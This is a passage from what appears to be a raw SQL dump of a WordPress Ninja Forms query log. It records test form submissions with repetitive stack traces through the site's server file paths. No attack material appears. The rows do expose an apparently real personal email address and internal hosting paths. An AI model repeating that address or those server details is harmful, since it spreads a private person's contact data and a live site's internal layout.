},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(27,14,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_303\' AND post_id = 162773',NULL,NULL),(28,14,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(29,15,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162773, \'_field_303\', \'Testing--2\')',NULL,NULL),(30,15,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(31,16,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_304\' AND post_id = 162773',NULL,NULL),(32,16,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(33,17,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162773, \'_field_304\', \'choll.03@comcast.net\')',NULL,NULL),(34,17,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(35,18,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_306\' AND post_id = 162773',NULL,NULL),(36,18,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(37,19,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162773, \'_field_306\', \'TEST--2\')',NULL,NULL),(38,19,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(39,20,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_307\' AND post_id = 162773',NULL,NULL),(40,20,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(41,21,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162773, \'_field_307\', \'TEST 2 OF THE Y &amp; F FORM\')',NULL,NULL),(42,21,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(43,22,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_302\' AND post_id = 162774',NULL,NULL),(44,22,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\"